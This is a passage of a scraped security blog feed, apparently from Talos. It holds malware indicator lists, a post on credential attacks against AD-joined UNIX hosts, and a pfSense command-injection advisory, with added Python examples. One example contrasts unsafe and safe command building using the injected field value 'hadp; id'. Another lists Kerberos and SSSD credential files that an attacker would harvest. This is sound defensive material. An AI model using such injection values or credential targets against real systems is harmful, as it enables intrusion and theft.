src="https://4.bp.blogspot.com/-NCSxdnfOpmw/XAqtA79tJOI/AAAAAAAABQM/fZKYmQ9LpMY-zfFOhRU_wRSw4KZ-rsd9gCLcBGAs/s640/14f659a71058babb085af0f228c34339da3f124fdd66f63976357d64e69c661f_umbrella.png" width="640" /></a></div><b><br /></b><br /><h3>Win.Packed.Passwordstealera-6765350-0</h3><br /><h4>Indicators of Compromise</h4><br 
/><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>173[.]194[.]175[.]108</li><li>104[.]16[.]17[.]96</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>N/A</li></ul><b>Files and or directories created</b><br /><ul><li>\??\E:\Sys.exe</li><li>\??\E:\autorun.inf</li><li>%LocalAppData%\Temp\holderwb.txt</li><li>%LocalAppData%\Temp\holdermail.txt</li><li>%SystemDrive%\DOCUME~1\ADMINI~1\LOCALS~1\Temp\dw.log</li><li>%LocalAppData%\Temp\bhvBB7A.tmp</li></ul><b>File Hashes</b><br /><ul><li>02e17144bd22b469828d3a6663ce5ec0c87e24e729322cb97cacbcb4b2949033</li><li>02fc82a18398f81deaee007c20d90e0e3c9722b30d2698f90e796023fc5e1740</li><li>04757c1d814ad34c90bdee0993b86a0b33301abffaee9818310341a950cb9815</li><li>0496858beb4cfd6709dff2122d85e33245ff41ec53831b8fcce61fc5702bef74</li><li>04f66de839722231e20ae25ced41dca0f5e62d1e50b0accca5b65b192d6e4c58</li><li>0526201aa5028da43a2e3d8192c2d62c6953e4f940a631a6365099a22c934200</li><li>055b60ff72bbfc431a15134e7dac00b64a3ba6f53f8041b62d3676e2c0e517fc</li><li>05a3db5d7b308fde9e5763fc960d88463eb1c517a1a645e9cd38229269bf1627</li><li>05e18862ebc7be845735b589227ee2ae63ee66bc7ffb3755c52a8f84495d80db</li><li>06b95f87826fe1272911920412ad972b931c31b1c785fa27ec05c177382da0b6</li><li>06c4d3945b94f611019fc283b93fd63fb3f8405796db59cb5f8222782d0c7ea4</li><li>0826278ce6120f1730ff87aa84ded08db3f6941cc910f46d9f57957ecf699049</li><li>092c6895af99df4b4c094f62e3a92d6d8bf0088844b4b6bbf691bb4f625850d3</li><li>0a46824e179fb9eb61835adb9c9a02919bf41a756f9dbf120cbaed51acf17166</li><li>0a82eb0c8e3d7c2334c4eff82dc394f65654bf72b8ceb6e9d940d90ed3a6ba0a</li><li>0af37d3cb266570cc11f48a4eff5fc4cc4636b7b180801e4cd677bd2d29ce22a</li><li>0b5552c57c06a47fe86276ff15b2695ac2e9dcc6cad5f98f2ba5c43e14932b89</li><li>0cbb8c5cac42acaaf4136770140177fe6261271ec1d035cd433a8b9a97e602d7</li><li>0cff7e9d13a3216254aba643143dd2
18ca25ec2a503be1516f97a10fed1a151c</li><li>0d07f7c0463a4db0108f63464284c6f278b5ebce3252c8c5172f51e123208d7f</li><li>0e187bb3f6a4c196a92d1ccdcdc0db28861a0be845f0930a9eb308d27489755f</li><li>0e428856132a0fc043f63994abd9cf9fe06975a21f16187d1758af8b73785b1e</li><li>0e4a73fe7c720fa7b00134247ba8aae22ff6cf3cb4edfd994fb599c102462b4b</li><li>0f4682294cea6ff676cc6aa4fbec8fb899bd3bda0b8f73c51e116304a85d5358</li><li>0f5a78e562be95f13a1fd161b81f11f142e560758b48f12b631b83a38645817e</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-n4bWutvkUM0/XAqtY_iD6MI/AAAAAAAABQc/bxbMV73bkMkonxjG0obmLMVlkT00ghBUACLcBGAs/s1600/0cbb8c5cac42acaaf4136770140177fe6261271ec1d035cd433a8b9a97e602d7_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://3.bp.blogspot.com/-n4bWutvkUM0/XAqtY_iD6MI/AAAAAAAABQc/bxbMV73bkMkonxjG0obmLMVlkT00ghBUACLcBGAs/s400/0cbb8c5cac42acaaf4136770140177fe6261271ec1d035cd433a8b9a97e602d7_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-XkLamHZQkmE/XAqtgeUXR4I/AAAAAAAABQg/sb2ZUH1RjHgyMvxiuc1HQPuy70ABZVQKgCLcBGAs/s1600/0cbb8c5cac42acaaf4136770140177fe6261271ec1d035cd433a8b9a97e602d7_tg.png" imageanchor="1" style="margin-left: 
1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://2.bp.blogspot.com/-XkLamHZQkmE/XAqtgeUXR4I/AAAAAAAABQg/sb2ZUH1RjHgyMvxiuc1HQPuy70ABZVQKgCLcBGAs/s640/0cbb8c5cac42acaaf4136770140177fe6261271ec1d035cd433a8b9a97e602d7_tg.png" width="640" /></a></div><b><br /></b><br /><h3>Doc.Downloader.Sagent-6766662-0</h3><br /><h4>Indicators of Compromise</h4><br /><b>Registry Keys</b><br /><ul><li>N/A</li></ul><b>Mutexes</b><br /><ul><li>N/A</li></ul><b>IP Addresses</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>144[.]217[.]96[.]196</li><li>68[.]66[.]224[.]4</li><li>188[.]40[.]14[.]253</li><li>185[.]45[.]66[.]219</li><li>192[.]185[.]122[.]50</li></ul><b>Domain Names</b> contacted by malware. Does not indicate maliciousness<br /><ul><li>www[.]creativeagency[.]biz</li><li>mandujano[.]net</li><li>biogas-bulgaria[.]efarmbg[.]com</li><li>mahimamedia[.]com</li><li>www[.]brgsabz[.]com</li><li>creativeagency[.]biz</li></ul><b>Files and or directories created</b><br /><ul><li>%LocalAppData%\Temp\zUw.exe</li><li>%LocalAppData%\Temp\dxaf1lgn.ghy.ps1</li><li>%LocalAppData%\Temp\mj5uf2iy.ilx.psm1</li><li>%LocalAppData%\Temp\CVRE3A0.tmp</li><li>%LocalAppData%\Temp\~DF21FCDFAA58A2E1E9.TMP</li><li>\TEMP\~$c0d21bd6c8e28fdebd78dd6505135b6cca400773990a89056de054ed7cbe29.doc</li></ul><b>File Hashes</b><br 
/><ul><li>0093dcbd8f4bbe4b06e73de6de547ad5993077a113a44c4323a976433246b86b</li><li>0842492265ff119471f0caa69725591341898fde26bf968bbd5471470154cd3b</li><li>201227dd0b8a0fa4b3d9b9cddf1f209c6de1addda9bff6adce66a626838f7e66</li><li>25884a9b024598d9acedc91f15fd6297cba4dc3f704d6a19f626c86e69667e17</li><li>29932262d4afc2f1c90346e826a4df4d56f18bce251fb70993d6d601ffbe51ec</li><li>2e3431ff0a71cbf27d91acbce1e1dc80e4ca59873f451dca029aa0548a732bd3</li><li>30a2e836865ade4af8e8e35726d7187658804ae243ec4a6ef1085d27c2ea18ed</li><li>3204ba3905b38598a69f46de696b2305f5d1052bf0c42d62facd220fdd6f59e1</li><li>3d50876ea89c344ce580f8105d16077c6345a23cf8738668fb0985abf6dcd03b</li><li>3f631a8710b38c08cc4ec7098949908017023ead46db09357c0cfa00e0f88b81</li><li>42a55cc69003e563f10fc82e660da83815e969d1b40018a4687ff024f2745e56</li><li>48c247e5dc712829c5af6a481e0466eb4c92d6ba88bd21bf396a72bd1b2ef22d</li><li>50e0322b2884afb29a5d3d00b59a46ec1328accd770e877b03024eaa81d487b4</li><li>5d4af8e033d5aadba853c0c16d63b672c521a93d5c595c8efde012e3a3a24424</li><li>7d25d591fe5291003a2c43e8d479dfd06ad40c2720a9fc3ffe4b304b97678602</li><li>8bf2b7e3d0b5d4928ba715c5a7060aea26a7c0fe487853135a03bf6d02af581b</li><li>8ca568c68a48c2af33147af88da854129364ae3217832cdae95842101ca031b9</li><li>8d782fc91c991a792498e33dc2db3a2c05f3a3630d6ee0ea5a616e95a67071ca</li><li>8ddc6466bafab540c2efbb2b24492addb9e8987c0fd54676f68d15e23cbe3480</li><li>9a43186e72bde764614b092b55d4dfba00f528c5f0d45e6ccb56dcee8763a845</li><li>9aee7617f88dfffed06e6998a6cfaf8dc1f92dc2ab0164b495a4980fcb9799e1</li><li>a0ad77058d9f583cc7d4127cbeb367e4d714968336157b8ef03e6945c260dc1e</li><li>aeb657063c6507df8da52bc48126c8cfd5d0bd89113d00e4ea1e698f8fb6425f</li><li>b1c0d21bd6c8e28fdebd78dd6505135b6cca400773990a89056de054ed7cbe29</li><li>b66d3770ec1baa5f15c4665d3ca734c4613c0d6bb0e9c167de0a70b1a44f5a41</li></ul><br /><h4>Coverage</h4><div class="separator" style="clear: both; text-align: center;"><a 
href="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://1.bp.blogspot.com/-9t2Of3KWq7I/Wz-6a6Dy3kI/AAAAAAAAAbk/5J2B6tJuFS44Fz9CyF7x9wPcTvmCLrV1gCLcBGAs/s320/all-selected-except-cloudlock.png" /></a> </div><br /><h4>Screenshots of Detection</h4><b>AMP</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-1_dHafzEuNY/XAqt81cnuqI/AAAAAAAABQs/YdlC0d0Taq81gZqlGEcgB2qEgmDZdBuLwCLcBGAs/s1600/8bf2b7e3d0b5d4928ba715c5a7060aea26a7c0fe487853135a03bf6d02af581b_amp.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="481" data-original-width="702" height="272" src="https://2.bp.blogspot.com/-1_dHafzEuNY/XAqt81cnuqI/AAAAAAAABQs/YdlC0d0Taq81gZqlGEcgB2qEgmDZdBuLwCLcBGAs/s400/8bf2b7e3d0b5d4928ba715c5a7060aea26a7c0fe487853135a03bf6d02af581b_amp.png" width="400" /></a></div><b><br /></b><br /><b>ThreatGrid</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-SxJyHmqiZc8/XAquDmGWdhI/AAAAAAAABQw/s3cbCjEIdl0q0EVFnLGPfPdFW9g-3KzVACLcBGAs/s1600/b1c0d21bd6c8e28fdebd78dd6505135b6cca400773990a89056de054ed7cbe29_tg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="801" data-original-width="962" height="532" src="https://1.bp.blogspot.com/-SxJyHmqiZc8/XAquDmGWdhI/AAAAAAAABQw/s3cbCjEIdl0q0EVFnLGPfPdFW9g-3KzVACLcBGAs/s640/b1c0d21bd6c8e28fdebd78dd6505135b6cca400773990a89056de054ed7cbe29_tg.png" width="640" /></a></div><b><br /></b><br /><b>Umbrella</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a 
href="https://1.bp.blogspot.com/-Pft9TboCGSQ/XAquLugd4sI/AAAAAAAABQ0/RHusgzQNJIou6p6yeL3UhgZrA7uijOCMwCLcBGAs/s1600/7d25d591fe5291003a2c43e8d479dfd06ad40c2720a9fc3ffe4b304b97678602_umbrella.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="272" data-original-width="870" height="200" src="https://1.bp.blogspot.com/-Pft9TboCGSQ/XAquLugd4sI/AAAAAAAABQ0/RHusgzQNJIou6p6yeL3UhgZrA7uijOCMwCLcBGAs/s640/7d25d591fe5291003a2c43e8d479dfd06ad40c2720a9fc3ffe4b304b97678602_umbrella.png" width="640" /></a></div><b><br /></b><br /><b>Malware</b><br /><b><br /></b><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-S9X5-HfoIHM/XAquRXTq2iI/AAAAAAAABQ4/gWJY6B1GPM8U4DSlSyS2KNgX77Pt16T_ACLcBGAs/s1600/7d25d591fe5291003a2c43e8d479dfd06ad40c2720a9fc3ffe4b304b97678602_malware.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="768" data-original-width="1024" height="480" src="https://2.bp.blogspot.com/-S9X5-HfoIHM/XAquRXTq2iI/AAAAAAAABQ4/gWJY6B1GPM8U4DSlSyS2KNgX77Pt16T_ACLcBGAs/s640/7d25d591fe5291003a2c43e8d479dfd06ad40c2720a9fc3ffe4b304b97678602_malware.png" width="640" /></a></div><b><br /></b>2018-12-13T14:17:23.243-05:000https://blog.talosintelligence.com/2018/12/threat-roundup-1130-1207.htmlAn introduction to offensive capabilities of Active Directory on UNIXhttp://feedproxy.google.com/~r/feedburner/Talos/~3/tL_yyAz8BX0/PortcullisActiveDirectory.htmlActive DirectoryBlack HatBlue TeamPortcullisnoreply@blogger.com (Joe Marshall)Tue, 04 Dec 2018 08:21:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-1664675579510275690Tim Wadhwa-Brown of <a href="https://labs.portcullis.co.uk/">Portcullis Labs</a> authored this post.<br /><br />In preparation for our <a 
href="https://www.blackhat.com/eu-18/briefings/schedule/index.html#where-2-worlds-collide-bringing-mimikatz-et-al-to-unix-12962">talk</a> at Black Hat Europe, <a href="https://www.cisco.com/c/en/us/products/security/advisory-services.html">Security Advisory EMEAR</a> would like to share the background on our recent research into some common Active Directory integration solutions. Just as with Windows, these solutions can be utilized to join UNIX infrastructure to enterprises' Active Directory forests.<br /><br /><br /><a name='more'></a><br /><h2>Background to active directory integration solutions</h2><br />Having seen an uptick in unique UNIX infrastructures that are integrated into customers' existing Active Directory forests, the question becomes, "Does this present any concerns that may not be well understood?" This quickly became "What if an adversary could get into a UNIX box and then breach your domain?"<br /><br />Within a typical Active Directory integration solution (in this case <a href="https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/5/html/5.7_release_notes/sssd">SSSD</a>), the solution shares a striking similarity to what a user might see on Windows. Notably, you have:<br /><br /><ul><li>DNS – Used for name resolution</li><li>LDAP – Used for "one-time identification" and assertion of identity</li><li>Kerberos – Used for ongoing authentication</li><li>SSSD – Like LSASS</li><li> PAM – Like msgina.dll or the more modern credential providers</li></ul><br /><br />You can see a breakdown of this process <a href="https://rhelblog.redhat.com/2015/02/04/overview-of-direct-integration-options/">here</a>. Unlike Windows, there is no Group Policy for the most part (with some exceptions), so policies for sudo et al. 
are typically pushed as flat files to hosts.<br /><br /><h3>Our research</h3><br />Realistically, the threat models associated with each part of the implementation should be quite familiar to anyone securing a heterogeneous Windows network. Having worked with a variety of customers, it becomes apparent that the typical UNIX administrator who does not have a strong background in Windows and Active Directory will be ill-equipped to handle this threat. We've been talking about successful attacks against components such as LSASS and Kerberos for quite some time: Mimikatz dates back to at least April 2014, and dumping hashes has been around even longer (Pwdump, which dumped local Windows hashes, was published by Jeremy Allison in 1997). However, no one has really taken a concerted look at whether these attacks are possible on UNIX infrastructure, nor how a blue team might spot an adversary performing them.<br /><br />As a result of this research, we were able to develop tactics, tools, and procedures that might further assist an attacker in breaching an enterprise, and we began documenting and developing strategies to allow blue teams to detect and respond to such incursions. The presentation and tactics, tools, and procedures for this talk will be available after our <a href="https://www.blackhat.com/eu-18/briefings/schedule/index.html#where-2-worlds-collide-bringing-mimikatz-et-al-to-unix-12962">Black Hat Europe talk</a>. 
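<br /><br />One way a blue team can start on the detection side of this problem is to inventory the credential material that a Mimikatz-style attack on an AD-joined UNIX host would go after and check how it is protected. The script below is an added example written for this page, not Portcullis' tooling, and it assumes the MIT Kerberos and SSSD defaults: the host keytab at /etc/krb5.keytab, /etc/sssd/sssd.conf (which can hold an LDAP bind credential in ldap_default_authtok), the per-domain cache_*.ldb files under /var/lib/sss/db (which store password hashes when cache_credentials is enabled), and FILE: credential caches named krb5cc_&lt;uid&gt;... in /tmp. The severity labels and the sample host state are the example's own.<br /><br />

```python
"""Inventory the Kerberos and SSSD credential material a Mimikatz-style attack
on an AD-joined Linux host would harvest, and flag weak permissions.

Added example for this page, not Portcullis' tooling. Paths are the MIT
Kerberos / SSSD defaults; the severity labels are this example's own choice."""
import os
import stat
from collections import namedtuple

# One filesystem object: absolute path, permission bits (0o644 style), owner uid.
Entry = namedtuple("Entry", "path mode uid")

KEYTAB = "/etc/krb5.keytab"        # host's own Kerberos keys (assumed default path)
SSSD_CONF = "/etc/sssd/sssd.conf"  # may carry ldap_default_authtok, a domain bind credential
SSSD_DB = "/var/lib/sss/db"        # cache_DOMAIN.ldb: cached password hashes if cache_credentials = True
CCACHE_DIR = "/tmp"                # FILE: ccaches named krb5cc_UID... (assumed default template)

NON_OWNER_READ = stat.S_IRGRP | stat.S_IROTH


def classify(entry):
    """Return [(severity, reason), ...] for one entry; empty list if uninteresting."""
    findings = []
    name = os.path.basename(entry.path)
    readable_by_others = bool(entry.mode & NON_OWNER_READ)

    if entry.path == KEYTAB and readable_by_others:
        findings.append(("HIGH", "keytab readable by non-root users: machine account keys exposed"))
    if entry.path == SSSD_CONF and readable_by_others:
        findings.append(("HIGH", "sssd.conf readable by non-root users: may leak the LDAP bind credential"))
    if entry.path.startswith(SSSD_DB + "/") and name.startswith("cache_") and name.endswith(".ldb"):
        findings.append(("MEDIUM", "SSSD domain cache present: offline password-hash cracking target"))
    if entry.path.startswith(CCACHE_DIR + "/") and name.startswith("krb5cc_"):
        severity = "HIGH" if readable_by_others else "INFO"
        findings.append((severity, "Kerberos ccache for uid %d: reusable ticket (pass-the-ticket)" % entry.uid))
    return findings


def audit(entries):
    """Map path -> findings for every entry that produced at least one finding."""
    report = {}
    for entry in entries:
        hits = classify(entry)
        if hits:
            report[entry.path] = hits
    return report


def collect_live(files=(KEYTAB, SSSD_CONF), dirs=(SSSD_DB, CCACHE_DIR)):
    """Stat the real host (run as root to see every ccache); returns a list of Entry."""
    entries = []
    for path in files:
        if os.path.isfile(path):
            st = os.stat(path)
            entries.append(Entry(path, stat.S_IMODE(st.st_mode), st.st_uid))
    for directory in dirs:
        if os.path.isdir(directory):
            for name in os.listdir(directory):
                path = os.path.join(directory, name)
                try:
                    st = os.lstat(path)
                except OSError:
                    continue
                if stat.S_ISREG(st.st_mode):
                    entries.append(Entry(path, stat.S_IMODE(st.st_mode), st.st_uid))
    return entries


# Constructed host state for an offline run (not data from a real system).
SAMPLE = [
    Entry("/etc/krb5.keytab", 0o644, 0),                        # misconfigured: world-readable
    Entry("/etc/sssd/sssd.conf", 0o600, 0),                     # correct
    Entry("/var/lib/sss/db/cache_corp.example.ldb", 0o600, 0),  # domain cache
    Entry("/var/lib/sss/db/config.ldb", 0o600, 0),              # not credential material
    Entry("/tmp/krb5cc_1001_AbCd12", 0o600, 1001),              # normal ccache
    Entry("/tmp/krb5cc_1002_XyZ987", 0o644, 1002),              # leaked ccache
]

if __name__ == "__main__":
    for path, hits in sorted(audit(SAMPLE).items()):
        for severity, reason in hits:
            print("%-6s %s: %s" % (severity, path, reason))
```

<br /><br />Run it as root on a joined host, replacing SAMPLE with collect_live(); for a fleet-wide sweep the same checks belong in whatever compliance scanner already visits every box. A world-readable keytab is the finding to fix first: anyone with a local shell can use the machine account's keys against the domain, which is close to what dumping LSASS yields on Windows.<br /><br />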
The presentation and tooling will also be available <a href="https://labs.portcullis.co.uk/">here</a>, and at our <a href="https://github.com/portcullislabs">GitHub repo</a>.<br /><br />2018-12-04T12:24:07.049-05:000https://blog.talosintelligence.com/2018/12/PortcullisActiveDirectory.htmlVulnerability Spotlight: Netgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerabilityhttp://feedproxy.google.com/~r/feedburner/Talos/~3/Sn3fPWIDgsk/Netgate-pfsense-command-injection-vulns.htmlcommand injectionNetgatepfSensevuln devvulnerabilitiesVulnerability Discoverynoreply@blogger.com (William Largent)Mon, 03 Dec 2018 11:51:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-6679146764018986375<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-P8KhgoWhlIU/XBKug9FQhtI/AAAAAAAAABA/RdpaLkGAweM_HuitA0db1BPT-aOrYM_mwCEwYBhgL/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://2.bp.blogspot.com/-P8KhgoWhlIU/XBKug9FQhtI/AAAAAAAAABA/RdpaLkGAweM_HuitA0db1BPT-aOrYM_mwCEwYBhgL/s1600/recurring%2Bblog%2Bimages_vuln%2Bspotlight.jpg" /></a></div><i></i><br /><div class="separator" style="clear: both; text-align: center;"></div><i>Brandon Stultz of Cisco Talos discovered these vulnerabilities.</i><br /><h2 style="text-align: left;"><br /></h2><h2 style="text-align: left;">Executive summary</h2>Today, Cisco Talos is disclosing three command injection vulnerabilities in the Netgate pfSense system_advanced_misc.php page, reached through its powerd_normal_mode, powerd_ac_mode and powerd_battery_mode parameters.&nbsp;pfSense is a free and open source firewall and router that also 
features unified threat management, load balancing, multi-WAN, and more.<br /><br />In accordance with our coordinated disclosure policy, Cisco Talos worked with Netgate to ensure that these issues are resolved and that an update is available for affected customers.<br /><br /><a name='more'></a><br /><h2 style="text-align: left;">Vulnerability details</h2><b>Netgate pfSense system_advanced_misc.php powerd_normal_mode Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4019)</b><br /><br /><div>This command injection vulnerability in Netgate pfSense is due to a lack of sanitization of the 'powerd_normal_mode' parameter in POST requests to '/system_advanced_misc.php': when processing such a request, the pfSense firewall does not properly sanitize the 'powerd_normal_mode' POST parameter before using it.&nbsp;</div><div><br /></div>For more information on this vulnerability, read the full advisory <a href="http://www.talosintelligence.com/reports/TALOS-2018-0690">here</a>.<br /><br /><br /><b>Netgate pfSense system_advanced_misc.php powerd_ac_mode Remote Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4020)</b><br /><br />A command injection vulnerability in Netgate pfSense exists due to a lack of sanitization of the 'powerd_ac_mode' parameter in POST requests to '/system_advanced_misc.php': when processing such a request, the pfSense firewall does not properly sanitize the 'powerd_ac_mode' POST parameter before using it.<br /><br />For more information on this vulnerability, read the full advisory <a href="http://www.talosintelligence.com/reports/TALOS-2018-0690">here</a>.
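<br /><br />The three parameters named in this advisory (powerd_normal_mode, powerd_ac_mode and powerd_battery_mode) share one shape: a value from the POST request reaches a command line without being validated. The snippet below is an added illustration written for this page in Python; it is not pfSense's PHP handler, and the powerd mode names, the flag layout and the default mode are assumptions made for the example.<br /><br />

```python
"""The shape of the three powerd command-injection findings, next to a hardened
version. Added example written for this page in Python; it is not pfSense's PHP
handler. The mode names, the powerd flag layout and the default mode are
assumptions made for the illustration."""
import shlex

# powerd(8) takes a small fixed vocabulary of modes; anything else is hostile input.
VALID_MODES = {"hadp", "adaptive", "minimum", "maximum"}
FLAGS = (("-a", "powerd_ac_mode"), ("-b", "powerd_battery_mode"), ("-n", "powerd_normal_mode"))


def build_unsafe(form):
    """Vulnerable shape: the three POST values are pasted into one command string
    that is later handed to a shell, so metacharacters in any of them are honored."""
    return "/usr/sbin/powerd -a %s -b %s -n %s" % (
        form["powerd_ac_mode"], form["powerd_battery_mode"], form["powerd_normal_mode"])


def build_safe(form):
    """Hardened shape: reject anything outside the allowlist, then build an argv
    list for an exec-style call, so no shell ever parses the input."""
    argv = ["/usr/sbin/powerd"]
    for flag, key in FLAGS:
        value = form.get(key, "hadp")
        if value not in VALID_MODES:
            raise ValueError("%s: rejected value %r" % (key, value))
        argv += [flag, value]
    return argv


def shell_commands(cmdline):
    """Tokenize cmdline the way a POSIX shell would and split it at ; | & so that
    any injected command shows up as a separate argv. Nothing is executed."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    commands, current = [], []
    for token in lexer:
        if token in (";", "|", "&", "&&", "||"):
            if current:
                commands.append(current)
            current = []
        else:
            current.append(token)
    if current:
        commands.append(current)
    return commands


# Constructed requests: one benign form post and one carrying an injected command.
BENIGN = {"powerd_ac_mode": "hadp", "powerd_battery_mode": "adaptive", "powerd_normal_mode": "hadp"}
EVIL = dict(BENIGN, powerd_normal_mode="hadp; id")

if __name__ == "__main__":
    print("unsafe/benign :", shell_commands(build_unsafe(BENIGN)))
    print("unsafe/evil   :", shell_commands(build_unsafe(EVIL)))  # second argv is ['id']
    print("safe/benign   :", build_safe(BENIGN))
    try:
        build_safe(EVIL)
    except ValueError as err:
        print("safe/evil     : rejected ->", err)
```

<br /><br />build_unsafe() is the pattern to look for in review: the value is spliced into a string that a shell will parse later, so a mode of "hadp; id" becomes a second command. build_safe() refuses anything outside a fixed allowlist and returns an argv list for an exec-style call, so the input is never parsed by a shell at all. Doing only one of the two (escaping without an allowlist, or an allowlist but still via a shell string) leaves room for the next bypass.<br /><br />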
<br /><br /><b>Netgate pfSense system_advanced_misc.php powerd_battery_mode Remote Command Injection Vulnerability (TALOS-2018-0690 / CVE-2018-4021)</b><br /><br />A command injection vulnerability in Netgate pfSense exists due to a lack of sanitization of the 'powerd_battery_mode' parameter in POST requests to '/system_advanced_misc.php': when processing such a request, the pfSense firewall does not properly sanitize the 'powerd_battery_mode' POST parameter before using it.<br /><br />For more information on this vulnerability, read the full advisory <a href="http://www.talosintelligence.com/reports/TALOS-2018-0690">here</a>.<br /><br /><h2 style="text-align: left;">Conclusion</h2><div>Cisco Talos tested and confirmed that Netgate pfSense CE 2.4.4-RELEASE is affected by these vulnerabilities.</div><h2 style="text-align: left;">Coverage</h2><a href="https://www.pfsense.org/security/advisories/pfSense-SA-18_09.webgui.asc" style="clear: left; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" data-original-height="251" data-original-width="1250" height="40" src="https://4.bp.blogspot.com/-88IoUK8efak/W_QN7sl_GMI/AAAAAAAAEp0/WAMOgXu72FIyWFHnvNVTBV6WQSjRMdm5ACLcBGAs/s200/patch_availability_available.jpg" width="200" /></a><br />The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. 
For the most current rule information, please refer to your Firepower Management Center or Snort.org.<br /><br />Snort Rules: 48178<br /><div><br /></div></div>2018-12-13T15:50:00.718-05:000https://blog.talosintelligence.com/2018/12/Netgate-pfsense-command-injection-vulns.htmlThreat Roundup for Nov. 23 to Nov. 30http://feedproxy.google.com/~r/feedburner/Talos/~3/671plxFAmfc/threat-roundup-1123-1130.htmlAMPCoverageThreat RoundupThreatGridUmbrellanoreply@blogger.com (William Largent)Fri, 30 Nov 2018 12:33:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-5597344513767261773<div dir="ltr" style="text-align: left;" trbidi="on"><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABU/K9l7ZEQxwTg8BM2N31Dod0MkCgwURbqVQCEwYBhgL/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="501" data-original-width="1001" src="https://4.bp.blogspot.com/-mBbj7I9pcbc/XBKwLGh3XTI/AAAAAAAAABU/K9l7ZEQxwTg8BM2N31Dod0MkCgwURbqVQCEwYBhgL/s1600/recurring%2Bblog%2Bimages_threat%2Broundup.jpg" /></a></div><br /></div>Today, Talos is publishing a glimpse into the most prevalent threats we've observed between Nov. 23 and Nov. 30. As with previous roundups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.<br /><br />As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. 
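<br /><br />The indicator lists in this post are defanged (dots written as [.]) so they cannot be clicked by accident, which also means they will not match logs as written. As an added example for this page, not Talos tooling, the script below refangs a handful of the domains and one IP address taken from the IOC sections on this page and runs them over a few constructed DNS, proxy and firewall log lines; the log lines, host names and field layout are made up for the example.<br /><br />

```python
"""Refang the indicators a roundup lists (dots written as [.]) and search log
lines for them. Added example for this page, not Talos tooling. The indicator
values are taken from the IOC lists on this page; the log lines, host names and
field layout are constructed for the example."""
import ipaddress
import re

# Indicators as they appear in the post (defanged).
IOCS = [
    "3ek6[.]top", "pvy1[.]top", "di29[.]top", "68d4[.]top",  # Doc.Malware.Donoff
    "cysioniven[.]com",                                       # Doc.Malware.00536d
    "144[.]217[.]96[.]196",                                   # Doc.Downloader.Sagent
]


def refang(ioc):
    """Undo the usual defanging so the value can match what logs actually contain."""
    return (ioc.strip()
            .replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
            .replace("hxxps://", "https://").replace("hxxp://", "http://"))


def load_iocs(defanged):
    """Split refanged indicators into an IP set and a lower-cased domain set."""
    ips, domains = set(), set()
    for raw in defanged:
        value = refang(raw).lower()
        try:
            ips.add(str(ipaddress.ip_address(value)))
        except ValueError:
            domains.add(value)
    return ips, domains


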